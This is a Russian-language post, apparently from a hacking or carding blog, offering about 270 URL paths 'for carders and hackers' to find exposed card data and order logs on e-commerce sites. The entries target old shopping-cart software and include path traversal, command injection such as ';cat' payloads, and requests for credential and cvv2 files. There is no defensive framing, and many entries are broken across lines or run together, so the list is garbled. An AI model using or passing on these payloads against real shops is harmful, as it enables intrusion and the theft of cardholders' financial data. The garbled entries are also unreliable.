Credit card Exploits

Один из способов, которым можно получить чужие личные данные, и данные карт - это поисковые системы, и сайты или магазины у которых по недосмотру и неопытности идентифицируются странички с этими данными, вот часто применяемый список запросов для кардеров и хакеров:
                                     
  1. /cgi-bin/DCShop/Orders/orders.txt
  2. /vpasp/shopdbtest.asp
  3. /orders/checks.txt
  4. /WebShop/logs
  5. /ccbill/secure/ccbill.log /scripts/cart32.exe
  6. /cvv2.txt
  7. /cart/shopdbtest.asp
  8. /cgi-win/cart.pl
  9. /shopdbtest.asp
  10. /WebShop/logs/cc.txt /cgi-local/cart.pl
  11. /PDG_Cart/order.log
  12. /config/datasources/expire.mdb
  13. /cgi-bin/ezmall2000/mall2000.cgi?
  14. page=../mall_log_files/order.log
  15. html /orders/orders.txt
  16. /cgis/cart.pl
  17. /webcart/carts
  18. /cgi-bin/cart32.exe/cart32clientlist
  19. /cgi/cart.pl
  20. /comersus/database/comersus.mdb /WebShop/templates/cc.txt
  21. /Admin_files/order.log
  22. /orders/mountain.cfg
  23. /cgi-sys/cart.pl
  24. /scripts/cart.pl
  25. /htbin/cart.pl /productcart/database/EIPC.mdb
  26. /shoponline/fpdb/shop.mdb
  27. /config/datasources/myorder.mdb
  28. /PDG_Cart/shopper.conf
  29. /shopping/database/metacart.mdb
  30. /bin/cart.pl /cgi-bin/cart32.ini
  31. /database/comersus.mdb
  32. /cgi-local/medstore/loadpage.cgi?
  33. user_id=id&file=data/orders.txt
  34. /cgi-bin/store/Admin_files/
  35. myorderlog.txt /cgi-bin/orders.txt
  36. /cgi-bin/store/Admin_files/
  37. your_order.log
  38. /test/test.txt
  39. /fpdb/shop.mdb
  40. /cgibin/shop/orders/orders.txt /shopadmin1.asp
  41. /cgi-bin/shop.cgi
  42. /cgi-bin/commercesql/index.cgi?
  43. page=../admin/manager.cgi
  44. /cgi-bin/PDG_cart/card.txt
  45. /shopper.cgi? preadd=action&key=PROFA&
  46. template=order 1.log
  47. /store/shopdbtest.asp
  48. /log_files/your_order.log
  49. /_database/expire.mdb
  50. /HyperStat/stat_what.log /cgibin/DCShop/auth_data/
  51. auth_user_file.txt
  52. /htbin/orders/orders.txt
  53. /SHOP/shopadmin.asp
  54. /index.cgi?page=../admin/files/
  55. order.log /vpshop/shopadmin.asp
  56. /webcart/config
  57. /PDG/order.txt
  58. /cgi-bin/shopper.cgi
  59. /orders/order.log
  60. /orders/db/zzzbizorders.log.html /easylog/easylog.html
  61. /cgi-bin/store/Log_files/
  62. your_order.log
  63. /cgi-bin/%20shopper.cgi?
  64. preadd=action&key=PROFA&
  65. template=sh opping400.mdb /comersus_message.asp?
  66. /orders/import.txt
  67. /htbin/DCShop/auth_data/
  68. auth_user_file.txt
  69. /admin/html_lib.pl
  70. /cgi-bin/%20shopper.cgi? preadd=action&key=PROFA&
  71. template=my order.txt
  72. /cgi-bin/DCShop/auth_data/
  73. auth_user_file.txt
  74. /cgi-bin/shop.pl/page=;cat
  75. %20shop.pl /cgi-bin/shopper?
  76. search=action&keywords=
  77. dhenzuser%20&templa te=order.log
  78. /HBill/htpasswd
  79. /bin/shop/auth_data/
  80. auth_user_file.txt /cgi-bin/cs/shopdbtest.asp
  81. /mysql/shopping.mdb
  82. /Catalog/config/datasources/
  83. Products.mdb
  84. /trafficlog
  85. /cgi/orders/orders.txt /cgi-local/PDG_Cart/shopper.conf
  86. /store/cgi-bin/Admin_files/
  87. expire.mdb
  88. /derbyteccgi/shopper.cgi?
  89. key=SC7021&preadd=action&
  90. template=orde r.log /derbyteccgi/shopper.cgi?
  91. search=action&keywords=moron&
  92. template= order.log
  93. /cgi-bin/mc.txt
  94. /cgi-bin/mall2000.cgi
  95. /cgi-win/DCShop/auth_data/ auth_user_file.txt
  96. /cgi-bin/shopper.cgi?
  97. search=action&keywords=root
  98. %20&templat e=order.log
  99. /store/commerce.cgi
  100. /scripts/shop/orders/orders.txt /product/shopping350.mdb
  101. /super_stats/access_logs
  102. /cgi-local/orders/orders.txt
  103. /cgi-bin/PDG_Cart/mc.txt
  104. /cgibin/cart32.exe
  105. /cgi-bin/Shopper.exe? search=action&keywords=psiber
  106. %20&templ ate=other/
  107. risinglogorder.log
  108. /cgibin/password.txt
  109. /Catalog/cart/carttrial.dat
  110. /catalog/Admin/Admin.asp /ecommerce/admin/user/admin.asp
  111. /data/productcart/database/EIPC.mdb
  112. /store/admin_files/
  113. commerce_user_lib.pl
  114. /cgi-bin/store/index.cgi
  115. /paynet.txt /config/datasources/store/
  116. billing.mdb
  117. /_database/shopping350.mdb
  118. /cgi-bin/shopper.exe?search
  119. /cgi/shop.pl/page=;cat%20shop.pl
  120. /cgi-bin/store/Admin_files/orders.txt /cgi-bin/store/commerce_user_lib.pl
  121. /cgi-sys/pagelog.cgi
  122. /cgi-sys/shop.pl/page=;cat
  123. %20shop.pl
  124. /scripts/weblog
  125. /fpdb/shopping400.mdb /htbin/shop/orders/orders.txt
  126. /cgi-bin/%20shopper.cgi?
  127. preadd=action&key=PROFA&
  128. template=my order.log
  129. /cgi-bin/shopper.exe?
  130. search=action&keywords=psiber& template =order.log
  131. /mall_log_files/
  132. /cgi-bin/perlshop.cgi
  133. /tienda/shopdbtest.asp
  134. /cgi-bin/%20shopper.cgi?
  135. preadd=action&key=PROFA& template=sh opping.mdb
  136. /cgi-bin/shopper.cgi?
  137. search=action&keywords=whinhall&
  138. templa te=order.log
  139. /WebShop/logs/ck.log
  140. /fpdb/shopping300.mdb /mysql/store.mdb
  141. /cgi-bin/store/Admin_files/
  142. commerce_user_lib.pl
  143. /config.dat
  144. /order/order.log
  145. /commerce_user_lib.pl /Admin_files/AuthorizeNet_user_lib.pl
  146. /cvv2.asp
  147. /cgi-bin/cart32/CART32-order.txt
  148. /wwwlog
  149. /cool-logs/mlog.html
  150. /cgi-bin/pass/merchant.cgi.log /cgi-local/pagelog.cgi
  151. /cgi-bin/pagelog.cgi
  152. /cgi-bin/orders/cc.txt
  153. /cgis/shop/orders/orders.txt
  154. /admin/admin_conf.pl
  155. /cgi-bin/pdg_cart/order.log /cgi/PDG_Cart/order.log
  156. /Admin_files/ccelog.txt
  157. /cgi-bin/orders/mc.txt
  158. /cgi/cart32.exe
  159. /ecommerce/admin/admin.asp
  160. /scripts/DCShop/auth_data/ auth_user_file.txt
  161. /Catalog/config/datasources/
  162. Expire.mdb
  163. /ecommerce/admin/shopdbtest.asp
  164. /mysql/mystore.mdb
  165. /cgi-bin/%20shopper.cgi? preadd=action&key=PROFA&
  166. template=sh opping.asp
  167. /cgi-bin/commercesql/index.cgi?
  168. page=../admin/files/order.log
  169. /cgi-bin/Count.cgi?df=callcard.dat
  170. /logfiles/ /shopping/shopping350.mdb
  171. /admin/configuration.pl
  172. /cgis/DCShop/auth_data/
  173. auth_user_file.txt
  174. /cgis/cart32.exe
  175. /cgi-bin/dcshop.cgi /cgi-win/shop/auth_data/
  176. auth_user_file.txt
  177. /shopping400.mdb
  178. /HBill/config
  179. /cgi-bin/shop/index.cgi?page=../
  180. admin/files/order.log /search=action&keywords=GSD
  181. %20&template=order.log
  182. /WebCart/orders.txt
  183. /PDG_Cart/authorizenets.txt
  184. /cgi-bin/AnyForm2
  185. /~gcw/cgi-bin/Count.cgi? df=callcard.dat
  186. /cgi-bin/PDG_Cart/order.log
  187. /expire.mdb
  188. /logger/
  189. /webcart-lite/orders/import.txt
  190. /cgi-bin/commercesql/index.cgi? page=../admin/admin_conf.pl
  191. /cgi-bin/PDG_Cart/shopper.conf
  192. /cgi-bin/cart32.exe
  193. /dc/orders/orders.txt
  194. /cgi-local/DCShop/orders/orders.txt
  195. /shop.pl/page=shop.cfg /cgi-local/cart32.exe
  196. /cgi-win/pagelog.cgi
  197. /cgi-win/shop/orders/orders.txt
  198. /cgibin/shopper.cgi?
  199. search=action&keywords=moron&
  200. template= order.csv /cgi-sys/DCShop/auth_data/
  201. auth_user_file.txt
  202. /cgi-bin/www-sql;;;
  203. /cgi-bin/%20shopper.cgi?
  204. preadd=action&key=PROFA&
  205. template=or der.log /scripts/orders/orders.txt
  206. /cgi-local/shop.pl/shop.cfg
  207. /search=action&keywords=cwtb
  208. %20&template=expire.mdb
  209. /php/mylog.phtml
  210. /config/datasources/shopping.mdb /php-coolfile/action.php?
  211. action=edit&file=config.php
  212. /cgi-bin/ezmall2000/mall2000.cgi
  213. /cgi/DCShop/orders/orders.txt
  214. /cgi-local/shop.pl
  215. /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp
  216. /ASP/cart/database/metacart.mdb
  217. /cgi-bin/cgi-lib.pl
  218. /cgi-bin/mailview.cgi?
  219. cmd=view&fldrname=inbox&select=
  220. 1&html /search=action&keywords=cwtb
  221. %20&template=order.log
  222. /mysql/expire.mdb
  223. /scripts/shop/auth_data/
  224. auth_user_file.txt
  225. /cgi-bin/cart32/whatever- OUTPUT.txt
  226. /Shopping%20Cart/shopdbtest.asp
  227. /cgi/shop/auth_data/
  228. auth_user_file.txt
  229. /shop/shopping350.mdb
  230. /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt
  231. /store/log_files/commerce_user_lib.pl
  232. /shopping/shopadmin.asp
  233. /cgi-bin/orderlog.txt
  234. /cgi-bin/webcart/webcart.cgi?
  235. CONFIG=mountain&CHANGE=YES& NEXTPAGE=;c at%20../../webcart/
  236. system/orders/orders.txt|
  237. &CODE=PHOLD;;;
  238. /cool-logs/mylog.html
  239. /cgibin/shop.pl/page=;cat%20shop.pl
  240. /htbin/shop.pl/page=;cat%20shop.pl /cgi-win/orders/orders.txt
  241. /cgi-bin/%20shopper.cgi?
  242. preadd=action&key=PROFA&
  243. template=or der1.txt
  244. /SHOP/shopdbtest.asp
  245. /cgi/pagelog.cgi /php/mlog.phtml
  246. /cgi-bin/shop/apdproducts.mdb
  247. /htbin/shop/auth_data/
  248. auth_user_file.txt
  249. /server%20logfile;;;
  250. /database/metacart.mdb /cgi-local/shop/orders/orders.txt
  251. /dcshop/auth_data/auth_user_file.txt
  252. /log/
  253. /cgi-bin/shop.cgi/page=../../../../etc/
  254. hosts
  255. /scripts/c32web.exe /cgis/orders/orders.txt
  256. /logfile/
  257. /shop_db/shopping.mdb
  258. /shopping.mdb
  259. /weblog/
  260. /config/datasources/cvv2.mdb /cgi-bin/loadpage.cgi?
  261. user_id=id&file=data/db.txtcgi-bin/
  262. PDG_Cart/order.log
  263. /cgi-sys/shop/orders/orders.txt
  264. /cgi-bin/%20shopper.cgi?
  265. preadd=action&key=PROFA& template=or der1.log
  266. /cgi-win/cart32.exe
  267. /cgi-bin/loadpage.cgi
  268. /dcshop/orders/orders.txt
  269. /shop/show.php?q='
  270. /cgibin/orders/orders.txt /bin/pagelog.cgi

Поделись сатьей

Дальше
« Prev Post
Прошлая тема
Next Post »